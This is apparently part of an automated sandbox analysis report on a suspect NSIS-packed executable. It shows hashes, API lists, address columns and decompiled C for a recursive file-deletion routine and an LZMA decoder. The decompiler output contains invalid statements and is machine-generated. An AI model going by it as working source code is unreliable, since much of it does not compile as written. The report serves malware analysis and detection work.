                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                          • String ID: /D=$ _?=$"$"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\3582-490$C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$sail Setup$~nsu.tmp
                                                                                                                          • API String ID: 2278157092-1579053907
                                                                                                                          • Opcode ID: dac8a3e4b42874552ff3bf8d63fabb06b1ed44114a57f908459e075a30442c4d
                                                                                                                          • Instruction ID: cc286ec977d2638fbe9c092aa5ad16f4889e12429ffafd7da1ab197300c5bae6
                                                                                                                          • Opcode Fuzzy Hash: dac8a3e4b42874552ff3bf8d63fabb06b1ed44114a57f908459e075a30442c4d
                                                                                                                          • Instruction Fuzzy Hash: 9691B170A08340AED7216F619D49B6B7EACEB0530AF44047FF581B62D2C77C9E458B6E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405302, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E00405302(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E004055B1(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f08 =  *0x423f08 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E004059DD(0x421480, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405517(_t72);
					} else {
						lstrcatA(0x421480, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x421480,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004054FB( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E004059DD(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405695(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404D7B(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f08 =  *0x423f08 + 1;
										} else {
											E00404D7B(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E0040572B();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405302(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421480 - 0x5c;
					if( *0x421480 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405CD8(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004054D0(_t72);
							E00405695(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D7B(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404D7B(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E0040572B();
						}
						L33:
						 *0x423f08 =  *0x423f08 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                                                          0x0040530d
                                                                                                                          0x00405311
                                                                                                                          0x0040531a
                                                                                                                          0x0040531d
                                                                                                                          0x00405320
                                                                                                                          0x00405328
                                                                                                                          0x0040532a
                                                                                                                          0x0040532b
                                                                                                                          0x00000000
                                                                                                                          0x0040532b
                                                                                                                          0x0040533a
                                                                                                                          0x0040533a
                                                                                                                          0x0040533d
                                                                                                                          0x00405340
                                                                                                                          0x00405354
                                                                                                                          0x0040535b
                                                                                                                          0x00405360
                                                                                                                          0x00405362
                                                                                                                          0x00405372
                                                                                                                          0x00405364
                                                                                                                          0x0040536a
                                                                                                                          0x0040536a
                                                                                                                          0x00405377
                                                                                                                          0x0040537a
                                                                                                                          0x00405385
                                                                                                                          0x0040538b
                                                                                                                          0x00405390
                                                                                                                          0x004053a0
                                                                                                                          0x004053a2
                                                                                                                          0x004053a8
                                                                                                                          0x004053ab
                                                                                                                          0x004053ae
                                                                                                                          0x0040546b
                                                                                                                          0x0040546b
                                                                                                                          0x0040546f
                                                                                                                          0x00405471
                                                                                                                          0x00405471
                                                                                                                          0x00405471
                                                                                                                          0x00405471
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004053b4
                                                                                                                          0x004053b4
                                                                                                                          0x004053bd
                                                                                                                          0x004053c3
                                                                                                                          0x004053c8
                                                                                                                          0x004053cb
                                                                                                                          0x004053cd
                                                                                                                          0x004053d1
                                                                                                                          0x004053d3
                                                                                                                          0x004053d3
                                                                                                                          0x004053d1
                                                                                                                          0x004053d6
                                                                                                                          0x004053d9
                                                                                                                          0x004053ec
                                                                                                                          0x004053ee
                                                                                                                          0x004053f3
                                                                                                                          0x004053fa
                                                                                                                          0x00405412
                                                                                                                          0x00405418
                                                                                                                          0x0040541e
                                                                                                                          0x00405420
                                                                                                                          0x00405445
                                                                                                                          0x00405422
                                                                                                                          0x00405422
                                                                                                                          0x00405426
                                                                                                                          0x0040543a
                                                                                                                          0x00405428
                                                                                                                          0x0040542b
                                                                                                                          0x00405430
                                                                                                                          0x00405432
                                                                                                                          0x00405433
                                                                                                                          0x00405433
                                                                                                                          0x00405426
                                                                                                                          0x004053fc
                                                                                                                          0x00405402
                                                                                                                          0x00405404
                                                                                                                          0x0040540a
                                                                                                                          0x0040540a
                                                                                                                          0x00405404
                                                                                                                          0x00000000
                                                                                                                          0x004053fa
                                                                                                                          0x004053db
                                                                                                                          0x004053de
                                                                                                                          0x004053e0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004053e2
                                                                                                                          0x004053e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004053e6
                                                                                                                          0x004053ea
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040544a
                                                                                                                          0x00405454
                                                                                                                          0x0040545a
                                                                                                                          0x0040545a
                                                                                                                          0x00405465
                                                                                                                          0x00000000
                                                                                                                          0x00405465
                                                                                                                          0x0040537c
                                                                                                                          0x00405383
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405342
                                                                                                                          0x00405342
                                                                                                                          0x00405344
                                                                                                                          0x00405475
                                                                                                                          0x00405478
                                                                                                                          0x0040547b
                                                                                                                          0x004054cd
                                                                                                                          0x004054cd
                                                                                                                          0x004054cd
                                                                                                                          0x0040547d
                                                                                                                          0x00405480
                                                                                                                          0x0040548b
                                                                                                                          0x00405490
                                                                                                                          0x00405492
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405495
                                                                                                                          0x0040549b
                                                                                                                          0x004054a1
                                                                                                                          0x004054a7
                                                                                                                          0x004054a9
                                                                                                                          0x00000000
                                                                                                                          0x004054c5
                                                                                                                          0x004054ab
                                                                                                                          0x004054af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004054b4
                                                                                                                          0x004054b9
                                                                                                                          0x004054ba
                                                                                                                          0x00000000
                                                                                                                          0x004054bb
                                                                                                                          0x00405482
                                                                                                                          0x00405482
                                                                                                                          0x00000000
                                                                                                                          0x00405482
                                                                                                                          0x0040534a
                                                                                                                          0x0040534e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040534e

                                                                                                                          APIs
                                                                                                                          • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 00405320
                                                                                                                          • lstrcatA.KERNEL32(00421480,\*.*,00421480,?,00000000,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 0040536A
                                                                                                                          • lstrcatA.KERNEL32(?,00409010,?,00421480,?,00000000,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 0040538B
                                                                                                                          • lstrlenA.KERNEL32(?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 00405391
                                                                                                                          • FindFirstFileA.KERNEL32(00421480,?,?,?,00409010,?,00421480,?,00000000,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 004053A2
                                                                                                                          • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405454
                                                                                                                          • FindClose.KERNEL32(?), ref: 00405465
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405302
                                                                                                                          • "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" , xrefs: 0040530C
                                                                                                                          • \*.*, xrefs: 00405364
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                          • String ID: "C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                          • API String ID: 2035342205-4184975021
                                                                                                                          • Opcode ID: 839bd3744fd32e7d0185c0b890ed2fdcf981fbc651edb5541a67b6ee6968ffb2
                                                                                                                          • Instruction ID: 4b200e60d3e8d58e0ab6cbb93b3ca9934a2dcfa31e3b076817fab6d13423d761
                                                                                                                          • Opcode Fuzzy Hash: 839bd3744fd32e7d0185c0b890ed2fdcf981fbc651edb5541a67b6ee6968ffb2
                                                                                                                          • Instruction Fuzzy Hash: 45511230844A48B6DB226B228C45BFF3A78DF4275AF14813BF845751D1C77C4981DE6E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405FA8, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00405FA8() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
